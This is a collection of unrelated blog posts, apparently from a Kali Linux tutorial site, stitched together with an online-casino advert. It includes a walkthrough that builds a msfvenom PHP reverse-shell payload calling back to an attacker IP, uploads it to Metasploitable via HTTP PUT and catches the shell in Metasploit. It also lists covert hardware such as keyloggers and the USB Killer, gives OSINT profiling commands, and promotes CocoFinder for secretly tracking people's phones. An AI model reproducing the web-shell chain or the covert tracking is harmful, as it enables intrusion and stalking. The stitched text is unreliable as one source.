Our in this platform we usually talk about various applications and their uses to check loopholes on systems. But penetration testers not only uses software applications, they also need some hardware to perform the tasks. In this detailed article we are going to cover hardware devices & gadgets used by an ethical hacker. Let’s start with a warning.

Warning:- This article is written for educational purpose only. To make it more ethical, we just only talk about the hardware devices publicly available in Amazon. Using these devices on our own for educational purpose isn’t crime, but using these devices against others without proper permission is illegal. So use these devices responsibly, we and Amazon will not be responsible for talking and selling these kind of product.

Lets start with a computer, most of cybersecurity experts prefer laptops, not desktops because laptops are portable. We had wrote an entire article about best laptops for Kali Linux, Moving forward ethical hackers uses some other hardware devices that is our main topic for today.

1. Raspberry Pi 4

Raspberry Pi dominating the market of single board computers (SBC). This device used by almost every security personals.

This is very useful we can install entire Kali Linux on this credit card sized computer. Raspberry Pi also can be used in many other projects. Cybersecurity experts use it on various way. We can see in Mr. Robot Season 1 Episode 5, how Elliot hacked the climate control network to destroy magnetic tapes.

There are unlimited uses of raspberry pi for an ethical hacker. This device is a must have for everyone on infosec field.

2. Raspberry Pi Zero W

This is a small handheld computer, ideal for carrying the best penetration testing software tools, and to handle all the external hardware hacking tools. The most known Cybersecurity distro for it is P0wnP1 A.L.O.A. and Kali Linux. P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W. The successor of P4wnP1 is called P4wnP1 A.L.O.A. We recommend the USB type-A pongo-pin adapter shown in the above picture.

We also can use it a headless system (without monitor). This device connected with a power bank in our bag and we can control it from our mobile device on our hand(using VNC).

3. USB Rubber Ducky

USB Rubber ducky is created and developed by Hak5. Nearly every computing devices accepts human input from keyboards, hence the ubiquitous HID specification – or Human Interface Device. Keyboards announce themselves to computers as HID devices and are in turn automatically recognized and accepted.

The USB Rubber Ducky delivers powerful payloads in seconds by taking advantage of the target computers inherent trust all while deceiving humans by posing as an ordinary USB drive.

In simple words, if we plug it on a computer, the computer think it is a keyboard and it will inject (type, save and execute) our preset payload on the computer. There are lots of payload available for this device. Also we can easily write our own code.

This is one of the bast way to compromise a system having physical access.

4. WiFi Pineapple

The Wi-Fi pineapple is the original Wi-Fi attack tool developed by Hak5. There are three different models available from Hak5. They all are good, here we choose Mark VII model for it’s value for money.

This will automate the auditing of WiFi networks and saves the results. We can control it with awesome web based interface. This is really a very good product for security testing o wireless networks.

5. HackRF One

HackRF One from Great Scott Gadgets is a Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz. Designed to enable test and development of modern and next generation radio technologies. We can read and manipulate radio frequencies using this device.

HackRF One is an open-source hardware platform that can be used as a USB peripheral or programmed for stand- alone operation. This SDR offers one important improvement compared to other cheap alternatives. But the Radio Frequency (RF) quality isn’t good as expected.

6. Ubertooth One

Ubertooth One is the most famous Bluetooth hacking tool we can find on the market. It is an open source 2.4 GHz wireless development platform suitable for Bluetooth hacking. Commercial Bluetooth monitoring equipment can easily be priced at over $10,000 , so the Ubertooth was designed to be an affordable alternative platform for monitoring and development of new BT, BLE and similar wireless technologies.

Ubertooth One is designed primarily as an advanced Bluetooth receiver, offering capabilities beyond that of traditional adapters, which allow for it to be used as a BT signal sniffing and monitoring platform. Although the device hardware will accommodate signal broadcasting, the firmware currently only supports receiving and minimal advertising channel transmission features.

7. WiFi Deauther Watch

As the name said it’s a deauther, it de-authenticate the WiFi users and they got disconnected. It’s not a jammer. It uses ESP8266 WiFi development board to do so. Here it’s watch version is looks super cool gadget for every hacker.

While a jammer just creates noise on a specific frequency range (i.e. 2.4 GHz), a deauthentication attack is only possible due to a vulnerability in the Wi-Fi (802.11) standard. The deauther does not interfere with any frequencies, it is just sending a few Wi-Fi packets that let certain devices disconnect. That enables us to specifically select every target. A jammer just blocks everything within a radius and is therefore highly illegal to use.

8. USB Killer

Computers doesn’t check the current flowing through USB, because it uses computers own power and can’t transmit more voltage. But what if we took an advantage of this to burn our (using on others is totally illegal) entire system.

When plugged into a device, the USB Killer rapidly charges its capacitors from the USB power lines. When the device is charged, -200VDC is discharged over the data lines of the host device. This charge/discharge cycle is repeated many times per second, until the USB Killer is removed. As the result target device becomes burned and unrepairable.

Its compact size and flash-drive style housing makes it an important device in every pen-tester’s toolkit. It can be used multiple times as we want.

9. Bad USB

This is a super alternative of USB Rubber Ducky. This device contains customized HW based on Atmega32u4 and ESP-12S. This device allows keystrokes to be sent via Wi-Fi to a target machine. The target recognizes the Ducky as both a standard HID keyboard and a serial port, allows interactive commands and scripts to be executed on the target remotely.

Attacker can easily carry it as a thumb drive and plug into any PC to inject payload, running own command on it, it also can be controlled over WiFi. It looks like innocent USB thumb drive, which is a great advantage. But this is doesn’t have faster speed like USB Rubber Ducky.

10. Hardware Keylogger

A hardware keylogger can be inserted between USB keyboard and computer. It captures all the keystrokes made from the keyboard, must have thing for every cybersecurity expert.

This is a basic hardware keylogger. It has 16 MB storage. Which is sufficient to capture keystrokes for a year generally. Later we can remove it and plug on our computer to read the keystrokes. Some keyloggers comes with WiFi controlling and SMS controlling functionality. No software can detect it’s there.

11. Adafruit Bluefruit LE Sniffer

Adafruit luefruit LE Friend is programmed with a special firmware image thatturns it into an easy to use Bluetooth Low Energy sniffer. We can passively capture data exchanges between two Bluetooth Low Energy (BLE) devices, pushing the data into Wireshark, the open source network analysis tool, where you can visualize things on a packet level, with useful descriptors to help us make sense of the values without having to crack open the 2000 page Bluetooth 4.0 Core Specification every time.

Note: We can only use this device to listen on Bluetooth Low Energy devices! It will not work on Bluetooth (classic) devices. Firmware V2 is an improved firmware from Nordic now has better Wireshark-streaming sniffer software that works with all OS for live-streamed BLE sniffing. The sniffer firmware cannot be used with the Nordic DFU bootloader firmware, which means that if we want to reprogram this device you must use a J-Link (and a SWD programmer board). We cannot over-the-air (OTA) reprogram it.

12. Micro-controllers

There are lots of micro-controllers used by ethical hackers. Some of them are must have in a ethical hackers backpack.

NodeMCU ESP8266

ESP8266 is a $6 WiFi development board and it can be used in various way, we can make WiFi deauther by our own. It also can be used to create phishing pages over WiFi.

Arduino Pro Micro

This tiny micro-controller is one of the best choice for ethical hackers. We can make our own DIY USB Rubber Ducky.

Arduino Pro Micro is really good thing at a very low price. But if we want to change the script then we need to reset and upload new script on it from our computer.

13. RTL-SDR

RTL-SDR is a very cheap software defined radio that uses a DVB-T TV tuner dongle based on the RTL2832U chip-set.

It can be used to intercept radio frequencies. We can use it for listening others conversations. It is also able to intercept GSM mobile calls and SMS. It is very useful for cybersecurity experts.

14. Proxmark3 NFC RFID Card Reader

Owning a Promark3 means owing the most powerful and most complete device RFID/NFC (LF & HF) testing in the frequencies of 125KHz / 134KHz / 13.56MHz.

This devices can make read the data of RFID and NFC cards and then make a copy of it. We can write the new copies on blank cards provided with this package. We we need more we can buy more blank cards on Amazon.

Therefore, investing some more bucks in upgrading it, it’s not a bad idea. To improve its range we need the extended range antennas for LF and HF.

Another new and nice upgrade for it, is the Blue Shark Bluetooth 2.0 upgrade, that permits controlling the proxmark3 wirelessly plus adding an external battery to create an autonomous proxmark3 that can be connected and controlled from your computer or smartphone. The Walrus NFC application has been updated to permit control by Bluetooth. It also fixes the high temperature concerns adding a metal cooler.

WiFi Adapters (Monitor Mode & Packet Injection)

WiFi adapter specially which supports monitor mode and packet injection is essential for WiFi penetration testing. So most of the hackers uses it. We had noticed that Alfa makes awesome adapters for cyber-security personals. We already discussed it on our Best WiFi adapter for Kali Linux article. Please check out that article before buying an WiFi adapter.

Something Extra

This is the gadgets for hackers we can directly buy from Amazon and help us on our ethical hacking journey. There are some more gadgets used by hackers but talking about them will be not ethical here. Most of them manufactured from china and available on some online stores. There are some cool stores like Hak5, but in this article we discussed about some gadgets which are openly available on Amazon.

Warning:- Using the above devices is not illegal. They are selling publicly on Amazon. But using these devices to harm anyone is totally illegal. We listed them for educational purpose and to safe ourselves from these kind of devices. If anyone uses this devices to harm anyone then we are not responsible for that, Amazon also not responsible. So use this devices responsibly, always remember:

That’s for today. Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

What is Fuzzing?

Fuzz testing or Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated task.

This analysis is a software-testing technique used by developers and penetration testers to test their applications against unexpected, invalid, and random sets of data input. The response will then be noticed in terms of an exception or a crash thrown by the application. This activity shows us some of the major vulnerabilities in the application, which are not possible to discover otherwise. These covers buffer overflows, format strings, code injections, dangling pointers, race conditions, denial of service conditions, and many other types of vulnerabilities.

Fuzzy analysis is a relatively simple and effective solution that can be incorporated into the quality assurance and security testing processes. That’s why fuzzy analysis is also called robustness testing or negative testing sometimes.

History of Fuzzing

Classic fuzz testing was developed at the University of Wisconsin Madison in 1989 by Professor Barton Miller and students. Their (continued) work can be found here. It’s mostly oriented towards command-line and UI fuzzing, and shows that modern operating systems are vulnerable to even simple fuzzing.

Attack types in Fuzzing

Commonly a Fuzzer (program for fuzzing) would try combinations of attacks on:

• numbers (signed/unsigned integers/float etc).
• chars (urls, command-line inputs).
• metadata : user-input text (id3 tag).
• pure binary sequences.

A common approach to fuzzing is to define lists of “known-to-be-dangerous values” (fuzz vectors) for each type, and to inject them or re-combinations.

• For integers: zero, possibly negative or very big numbers.
• For chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands etc).
• For binary: random ones.
• For chars: escaped, interpretable characters / instructions (ex: For SQL Requests, quotes / commands etc).

There are different classes of fuzzers available in Kali Linux, which can be used to test the file formats, network protocols, command-line inputs, environmental variables, and web applications. Any non-trusted source of data input is considered to be insecure and inconsistent. For instance, a trust boundary between the application and the Internet user is unpredictable. Thus, all the data inputs should be fuzzed and verified against known and unknown vulnerabilities. In our some later article we are going to learn about Fuzzers on our Kali Linux system.

Why Fuzzing is important on Security Testing?

The purpose of fuzzing based on the assumption that there are bugs within every program, which are waiting to be discovered. Then, a systematic approach should find them sooner or later.

Fuzzing can add another perspective to classical software testing techniques (hand code review, debugging) because of it is non-human approach. It doesn’t replace them, but is a reasonable complement, thanks to the limited work needed to put the procedure in place.

References

• Wikipedia Article.
• Fuzzing-related papers.
• The fuzzing mailing list archive.
• OWASP community Article.

Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

OSRFramework is an awesome open-source OSINT tool. This is a set of libraries to perform Open Source Intelligence tasks. They include references to a bunch of different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction, and many others. This is a very good information gathering framework for gathering information against corporate sectors as well as an individual.

Introduction & Installation

OSRFramework didn’t comes pre-installed on our Kali Linux system but we can install it easily with Kali Linux repository. To install it we need to run following command on our Kali Linux terminal, sudo apt install osrframework. But this osrframework is the older version, some things not properly works. 

The newer version is available on PyPI, to use this we need to use pip install command.

Before installing, let us know some details about this framework. OSRFramework have some tool set, we can use them in order to collect information from various sources. They are following:

• Domainfy: Checks whether domain names that use words and extensions are available.
• Mailfy: Gets information about emails taken as a reference either a nickname (to generate a list of possible emails) or the email list.
• Chechfy: Guesses possible emails based on a list of candidate nicknames and a pattern.
• Phonefy: Recovers information about mobile phones linked to known spam practices.
• Searchfy: Finds profiles linked to a full name.
• Usufy: Identifies social media profiles using a given nickname.
• Alais_generator: Find a person from all over the internet.

So first of all we need to update our system by using following command:

sudo apt update -y

Then we need to install python3-pip and python-setuptoools by using followinng command:

sudo apt install python3-pip python-setuptools

Now we are ready to install OSRFramework. To install it we run following command on our terminal:

sudo pip install osrframework

The above command will clone OSRFramework on our system as we can see on the following screenshot:

This command will start installing OSRFramework, it might take couple of minutes to finish it depending on our internet connection speed.

Now we are ready to run it. We can check help of every component or modules by putting the module name with -h flag on our terminal. For an example for checkfy help we can type checkfy.py -h on our terminal to check checkfy’s help.

In this detailed article we are going to cover all these modules on OSRFramework. Let’s start.

Domainfy

By using domainfy we can gain information about domains. This framework will begin querying whois and provide the results in a table format after a few seconds. In our example, we have used the following command:

domainfy.py --whois -n google

On the following screenshot we can see the information table of domain called “google”.

We also can use -t option to check all the domain extension for a domain name. For an example if we want to look for websites available for “kali” name.

We need to use following command:

domainfy.py -n kali -t all

On the following screenshot we can see that all the domains available with this name.

Usufy

If we know an username of someone then we can search it on everywhere (all over the social media sites) by using usufy module. For an example we know an username “KaliLinux_in”, so we need to run following command on our terminal to hunt this username:

usufy.py -n KaliLinux_in

Then it will start searching this username on more than 200 social media sites. In our case it took more then 4 minutes (Sherlock might be faster then usufy). In the following screenshot we can see it got our Twitter (follow to get updated) handle.

It also saves the output file on our home directory.

Mailfy

we can attempt to obtain the email addresses of a given search string. In this example, we are attempting to discover email addresses that contain the “kalilinux” string, which has been used on various websites on the internet. We can begin by using the following command:

mailfy.py -n kalilinux

In the following screenshot we can see that mailfy havegot some email address on the internet:

It also check the founded mails on social media platforms.

Searchfy

By using the Searchfy module on OSRFramework we can check for a string all over the OSRFramework, a name, a domain, social media profile etc. We need to use it with -q flag. For an example we search for “Elon Musk” by using following command:

searchfy.py -q "Elon Musk"

On the following screenshot we can see lots of results comes in:

Here one thing, Elon Musk is famous personality we may encounter with many fake profiles on the internet.

Phonefy

We can check telephone number leakage is simple with Phonefy in OSRFramework. We can run it by using following command:

phonefy.py -n 959750585

In the following screenshot we can see that here is some results as link about this phone number.

But personally we think WhitePages are batter then this for searching a phone number.

Alias_Generator

Alias_generator is a module that tries to generate possible user names based on personal information. It works in interactive mode (no need flags), so lets run it by using following command:

alias_generator.py

Then it will ask us some information about our target like,

1. Name.
2. First surname.
3. Second surname.
4. A Year (ex Birthyear).
5. Insert a city.
6. Country.
7. Some extra words.

If we leave a point blank we need to just press enter to skip it. In the following screenshot we have searched for someone’s username:

On the above screenshot we have a list with possible usernames. We can search this usernames on social media using Sherlock or usufy.

Final Talks

We need to have latest Python and pip installed on our system to run OSRFramework. To upgrade this framework we need to run following command:

sudo pip install osrframework --upgrade

As we have seen, OSRFramework is another very powerful tool within the Kali Linux platform. Using a tool such as this can save us a lot of time during our information-gathering process.

Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

Online casinos in India have got maximum popularity in terms of the games and promotions they offer. A person can’t find all these promotions and 2000+ games over a land-based casino; hence, online casinos in India have increased by 10X. Also, covid-19 contributed to the growth of online casinos in India as more and more people were attracted to playing casino games.

Moreover, these online casinos provide convenient payment options such as UPI, which accepts Indian rupees. However, the top priority of online casinos in India has always been utmost security. What online casinos in India want is tight security for their players so that their money isn’t lost anywhere.

Not only money but their data remains in secured hands. Hence, they’ve lately been focusing on improving their cybersecurity. When server security comes into action, the name of the Linux operating system appears at the top. 

You would be surprised to know that Linux provides higher security when compared to operating systems giants such as Windows. The reason behind this statement is Linux is an open-sourceoperating system. Therefore, many whitehat hackers or ethical hackers have provided various security features. This article will shed light upon the usage of Linux for an online casino in India and how top online casinos are moving towards Linux for better server security.

Benefits of using Linux server for online casinos in India

Though Linux has been there for ages, it was unknown to many people till now. It was only under the central hub of developers until online casinos in India found it beneficial. Linux servers have various great features as compared to other operating systems. Below are the advantages that an online casino get by using a Linux server for hosting their games:

Zero or Low Cost

Since Linux is an open-source operating system, any online casinos in India can get it for almost zero rupees. Similarly, an online casino has to incur heavy expenses when they choose another operating system. Well, you might be thinking that with every free commodity or service, there comes a terms and conditions page. 

However, with Linux, a casino doesn’t have to pay anything and even worry about terms and conditions as it is available for free. The Linux source code also allows a casino to use or alter it for commercial purposes. Even a person can easily install Linux as an operating system into their PCs for zero money.

A casino can find Linux more secure by design

Many developers who work for building many online casinos in India believe that Linux is more secure than any other operating system. Many surveys have claimed that Linux handles its user permissions better than any other operating system. There are various design security principles that Linux adheres to, and prolifically, it happens by default. 

It is not complex to use

There is a common notion or myth circulated amongst people and even businesses that Linux is tough to use. Though it is for free, businesses restrain themselves from using Linux because they feel it is not user-friendly or more complicated. Another reason is that the companies are used to commonly used operating systems, and hence, it becomes a bit complex to shift to Linux. 

However, Linux isn’t at all complicated to use. It is pretty user-friendly as well. A user or a player can run their .exe files in Linux using WINE. And not just online casinos, India’s top casino review website, casinofox.inalso runs on a linux server.

Stress-free updates

All the software updates in Linux are always hassle-free because all of the updates from Linux are in patches. In simple terms, a person isn’t required to restart their system to cater to those updates. We all know that these updates consume a lot of time and when the reboot option comes, it disappoints many people and developers, especially when they’re building new casino features. 

Community support

It is beneficial from the developers’ end because they don’t remain alone when they develop a new casino site or update it. They get the hands and expertise of the community members who use Linux for their business use.

It secures customers’ data

Most of the viruses are developed, keeping in mind the Windows’outlook. However, Linux operating systems have very few viruses that can attack a customer’s data. This is due to the fact that in Linux, a person doesn’t require antiviruses. Installing the antivirus in Windows also results in slow performance – which is a plus point with Linux.

It is legal for any casino to choose Linux

Linux issues the license for free and for commercial usage. Hence, using Linux for any online casino in India is as legal as placing a bet at horse racing. Whereas, in Windows, if the key comes out to be invalid, then a casino server built upon Windows may face legal consequences or implications. Nothing of this sort ever happens in Linux, as it is very secure and legal.

Diversity with different Linux flavors

Though there has been a monoculture of Windows and no other operating system got the same opportunity as Windows, it becomes crucial that the industry thinks about alternatives. Like agriculture, one can not have the same yields and harvests every time as it harms nature and soil. In development and engineering, a business should explore different ways to get the utmost security at an affordable price. Also, Linux offers various flavors to choose from!

Final Words

Online casinos in India are on the rise, the same as cryptocurrencies like bitcoin are. Every 2 in 5 persons gamble once a year, and hence, it becomes essential for a casino to build its most substantial server with advanced security features. There is no better option than Linux for an online casino based out either in India or abroad.

There are so many code editors in the market, but now many developers found liking Virtual Studio Code. In this community we have seen many of friends switched on Virtual Studio Code (VSCode) from Atom and Sublime Text.

VSCode is an awesome code editor, it’s totally free also. In this brief tutorial we are going to install VSCode on our Kali Linux system.

Installing VSCode on Kali Linux

Before June 2021 we need to download the source-code of VSCode but now Kali Linux added VSCode on the repository.

We need to run one single command “sudo apt install code-oss” to install VSCode on our Kali Linux system. Code-oss is an open-source fork of VSCode without any proprietary code.

We run the following command on our terminal:

sudo apt install code-oss -y

It will start installing Virtual Studio Code on our Kali Linux after providing our root password, as we can see on the following screenshot.

It will download nearly 75 MB archives and take nearly 270MB disk space. So the installation time will depend on our internet speed and system performance.

Using VSCode on Kali Linux

After the process complete we can see code-oss aka VSCode on our application menu.

We can click here to open it. Alternatively we can run code-oss command from our terminal to open it.

code-oss

The welcome screen will be in front of us as we can see in the following screenshot.

Now our coding will be hassle free with our favorite code editor.

This is the most easiest way to install Virtual Studio Code aka VSCode aka code-oss on Kali Linux. If enjoyed the article make sure to comment on following comment section, that encourage us.

Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

The advancements that we see now in the world of today are highly ferocious and can be detrimental if they are used without any measure or extent of their usage. The most primary device that can be enlisted for the perils it possesses is the mobile phone.

The mobile phone can be deemed as a necessary evil of today’s world as there are a lot of functions as well as dangers associated with the little device on your palm. The mobile phone can be subjected to a lot of things that can prove dangerous for you in the long run.

Photo by Mael BALLAND on Unsplash

However, if you want to check on a person and acquire whether the person you are in contact with on a daily basis is a genuine contact or not. There are a lot of things that can help identify several details of the owner of the phone.

Here is what you need if you want the information about the person from the cell phone:

CocoFinder: Track Someone Easily Without Letting Anyone Know

CocoFinder is a unique tool that has been created for the purpose of finding out the details of a person with the help of a mobile number. You can also check out someone’s location with the help of CocoFinder and enjoy all of these privileges for a detailed debrief.

CocoFinder is a highly recognized brand that can be used for a lot of purposes and can be employed in several tasks to ensure that the details given are accurate as well as trust-able. You can get into the details of the person you want via CocoFinder and enjoy all of the privileges it provides to the users.

Enter a Phone Number to Track It Down

t’s as simple as typing in someone’s phone number and tracking their phone to find out where they are. CocoFinder is an internet cell phone monitoring service that allows you to trace the position of anyone’s phone in real time.

It’s a hidden phone location tracker that only requires the phone number to track the user’s position. CocoFinder can show you the person’s present address, their office location, read more about tracking someone’s phone, and even their previous addresses when it comes to location.

There are various more parameters that can be used to locate a phone number. It’s possible that you won’t even need someone’s phone number to figure out where they are.

The entire interface is in the form of a search engine and is accessible via CocoFinder’s website. There are several parameters to use while looking for someone’s location, including:

Phone Number

This is an excellent approach to track down a questionable missed caller or someone you used to know. When you enter a phone number, it displays the owner of the number as well as their location.

Name

CocoFinder also allows you to look up someone’s location by their name. Simply search for the person by entering their first and last name. CocoFinder will return all of the search results that are relevant to the question.

Email address

A person’s social media profiles can be found by searching for their email address. Other information associated with the email address, such as the user’s phone number, is also available.

Postal Code

CocoFinder also allows you to look for someone by their address. When looking up someone’s phone location using their phone number, though, their address may not be something you already know.

What Is The Use Of CocoFinder?

CocoFinder is a tough and reliable instrument that gives you unique and accurate information on the target and determines whether or not the individual can be trusted. CocoFinder is still the most popular option for everyone who wants to keep their secrets hidden.

CocoFinder is a well-known brand since it has attracted a significant number of fans and active users who rely on it as a first line of defence in their quest for information.

CocoFinder laces you with specific and trustable details that make it easy for you to check out the authenticity of the person you are spying on and whether to trust them or not. Here are a few things that are proudly presented by CocoFinder to ensure secrecy as well as brilliance in the field.

How Does CocoFinder Track a Location?

CocoFinder can locate any Android phone with the same ease as it can an iPhone. The only thing you’ll need is the target iPhone’s iCloud credentials, and you’ll be ready to go. Follow the steps below to track an Android location using its number:

Step 1: Go to CocoFinder’s main page and select the “Reverse Phone Lookup” option.

Step 2: Enter the target phone’s phone number.

Step 3: Select the ‘Search’ option from the drop-down menu.

Step 4: CocoFinder will search its databases for information about the owner of the phone number. You may find out where they are located by clicking here.

Why Only CocoFinder:

CocoFinder is a brilliant tool with a multitude of countries using this as a primary line of defence against persons that are unworthy of trust. Here are a few features that make it one of its kind in the race:

• Ultimate security with the guarantee of protection from the third party.
• Low-cost procedures and effective results which guarantee accuracy.
• Brilliant features that aid in the search.
• Security of your database as all of your data is deleted soon after you quit the site.

Conclusion:

CocoFinder is a brilliant tool that needs to be used at all costs to avoid uncertainty and to make sure that you as well as your loved ones are safe from any danger that can come from the usage of social media or mobile phones.

CocoFinder is a maestro when it comes to tracking down targets.

Cadaver is a command line WebDAV client for UNIX. It supports uploading and downloading of a file on WebDAV. Cadaver comes pre-installed with Kali Linux. We can upload web shells also on a vulnerable system using HTTP PUT method.

What is HTTP PUT method?

PUT method originally introduced as one of the HTTP method to be used for file management works. The problem is if the HTTP PUT method is enabled on a web-server then it can be used to upload a malicious elements to the target server, thinking about a web shell?

How to check for HTTP PUT vulnerability?

To confirm that a target system has HTTP PUT method allowed us to upload malicious shells we can scan our target using Nikto. Here for an example we have Metasploitable 2 running.

We scan this vulnerable web server with Nikto by using following command:

nikto -h http://172.17.0.2/dav/

On the following screenshot we can see that this vulnerable web application allow us to save files on web server via HTTP PUT method:

Web application allow to save files on web server via HTTP PUT method

Now we need a web shell to upload here. We can use msfvenom or any other method. For msfvenom we need to run following command to create a web shell.

msfvenom -p php/meterpreter/reverse_tcp lhost=172.17.0.1 lport=4444 -f raw

Here the lhost is our attacker system IP address (172.17.0.1 in our case). After running the msfvenom command the RAW backdoor will be created, as we can see in the following screenshot:

Now we can create a shell.php (any name with .php file extension) and paste the highlighted payload/shell there. Now it’s ready to upload.

Upload Web Shell using Cadaver

As we said earlier Cadaver is a command line tool pre-installed in the Kali machine that enables the uploading and downloading of a file on WebDAV. Firstly, we need to specify our target using Cadaver by using following command:

cadaver http://172.17.0.2/dav/

Then we need to put our web shell php file by using following command:

put /home/kali/testshell.php

On the following screenshot we can see that we have successfully uploaded our web shell on our target web server.

Now if we refresh our target website we can see that cadaver uploaded web shell to this server.

Now we can easily exploit it by using msfconsole. We need to run msfconsole command on our terminal to open Metasploit Framework Console.

msfconsole

After opening msfconsole we set our handler, set payload, set lhost (attacker ip), set lport and exploit it by using following commands one by one.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 172.17.0.1

set lport 4444

exploit

Then our reverse tcp handler will started. We now need to click on our payload on the website.

BINGO !! WE GOT reverse SHELL.

This is how we can exploit HTTP PUT vulnerability using Cadaver using our Kali Linux system.

How to be Safe From HTTP PUT Vulnerability?

This method is used to change or delete the files from the target server’s file system. It is also higher risks on various file uploading vulnerabilities, and this vulnerability will lead various dangerous cyber attacks. To make servers more secure we suggest the file access permissions of the organizations secure servers should be limited with restricted access to authorized, if the organization are going to use HTTP PUT method.

Love our articles? Make sure to follow us on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

On Kali Linux’s latest 2021.2 update Kali Linux included Ghidra on Kali Linux large image and repository, means now it’s more easier to install and use Ghidra on our Kali Linux system. But, what is Ghidra? A dragon?

What is Ghidra ?

Ghidra is an open-source software reverse engineering (SRE) framework developed by National Security Agency (NSA) Research Directorate of United States, for NSA’s Cyberseurity mission.

The binaries were released at RSA Conference in March 2019; the sources were published one month later on GitHub. Ghidra is seen by many security researchers as a competitor to IDA Pro. The software is written in Java using the Swing framework for the GUI. The decompiler component is written in C++. Ghidra plugins can be developed in Java or in Python (provided via Jython).

It is a Java based GUI reverse engineering framework, it is able to de-compile a application from binary and understand the logic of the code. NSA used it to find malwares inside a application, it also very useful for finding bugs on applications.

How to Install Ghidra on Kali Linux 2021

If we wrote this article before Ghidra comes with Kali (June, 2021, then the installation process will be larger and complex.

But now we just need one command to install it on our Kali Linux system. We need to use following command:

sudo apt install -y ghidra

The above command will install Ghidra on our Kali Linux system. It will download more than 250 MB and take almost 750 MB disk space on our system. So installing it will consume some time depending on our network speed and system configuration. Coffee Break ?.

How to use Ghidra on Kali Linux

After installing Ghidra on our Kali Linux system we can open this GUI based tool by using following command to open it up:

ghidra

The above command will open Ghidra on our Kali Linux system, or we can search for it on Application menu. As we can see on the following screenshot:

Here Ghidra is showing us the “User agreement” to use this tool. We need to read it carefully then click on “I agree” for the very first time of using Ghidra.

After clicking on ‘I agree’ Ghidra will open two window, one for help another is the Ghidra framework’s main screen, we can check the help if we want, but here we close it and focus on Ghidra. It looks like the following screenshot:

Here we can see that we don’t have any active project on our Ghidra. So we need to import a project. We have an exe file here to test. First of all we need to go to  the menu File>New Project, as shown in the following screenshot.

Then we need to select our new project type, here we are choosing non-shared project.

We click on “Next”, now we need to select the project location and name. We have chosen the default home path and named the project as we wish, see the following screenshot below.

Then we click on “Finish”, to complete creating a new project.

On the above screenshot we can see that a new project created on Ghidra.

Now here we can import an application file. For an example we have an exe file. We can directly drag & drop the application file over the project or we can simply press I to import application file for testing, We can also choose from menu File>Import File.

Then we need to choose application file to test as shown in the following screenshot:

Here we have choose an shell.exe file for testing. We select it to import.

We can see some details of importing file, we click on “OK“.

Here in this window we can see the import file summary on Ghidra. We press ‘Enter‘ ↩ key here.

Now Ghidra will import the file and prompt to analyze the application file on CodeBrowser.

We click on “Yes“. Then on a new window we need to select analyzers. There are lots of analysis configuration options do exist. We can see a description of every option by clicking on it, the description is displayed in the upper-right Description section.

Let’s click on Analyze to perform the analysis of the file. Then, we can see the Ghidra CodeBrowser window. We shouldn’t worry if we forget to analyze something, we can reanalyze the program later (by going to the Analysis tab and then Auto Analyze ‘shell.exe’).

Ghidra CodeBrowser

Here we are in Ghidra CodeBrowser. From here we can analysis application data and logic. Ghidra CodeBrowser has a good and well-chosen interface. Let’s briefly know about it.

Let’s see how CodeBrowser is distributed by default:

1. Usually, by default in reverse engineering frameworks, in the center of the screen, Ghidra shows a disassembly view of the application file.
2. As the disassembly level is sometimes a too low-level perspective, Ghidra incorporates its own de-compiler, which is located to the right of the disassembly window. The main function of the program was recognized by a Ghidra signature, and then parameters were automatically generated. Ghidra also allow us to manipulate de-compiled code in a lot of aspects. Of course, a hexadecimal view of the file is also available in the corresponding tab. These three windows (disassembly, de-compiler, and the hexadecimal window) are synchronized, offering different perspectives of the same thing.
3. Ghidra also allow us to easily navigate in the program. For instance, to go to another program section, we can refer to the Program Trees window located in the upper-left margin of CodeBrowser.
4. If we prefer to navigate to a symbol (for example, a program function), then we need to go just below that, to where the Symbols Tree pane is located.
5. If we want to work with data types, then we need to go just below that again, to Data Type Manager.
6. As Ghidra allows scripting reverse engineering tasks, script results are shown in the corresponding window at the bottom. Of-course, the Bookmarks tab is available in the same position, allowing us to create pretty well-documented and organized bookmarks of any memory location for quick access.
7. Ghidra has also a quick access bar at the top.
8. At the topmost part of CodeBrowser, the main bar is located. Now we know the default perspective of Ghidra.
9. Following the current address, the current function is shown.
10. In addition to the current address and the current function, the current disassembly line is shown to complete the contextual information.
11. Finally, at the bottom right, the first field indicates the current address.

Ghidra is highly customizable framework. It has tons of features and also we can run our own scripts on it. Covering every details of Ghidra is not possible on an article. Ghidra is a huge topic we must need an entire book to learn it clearly.

What just we said? A BOOK? We have it. We have a very good book on Ghidra, which one covers Ghidra in total. Check our Telegram Group to get the book. Here is the Ghidra official Cheat Sheet.

Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub, we post article updates there. To join our KaliLinuxIn family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.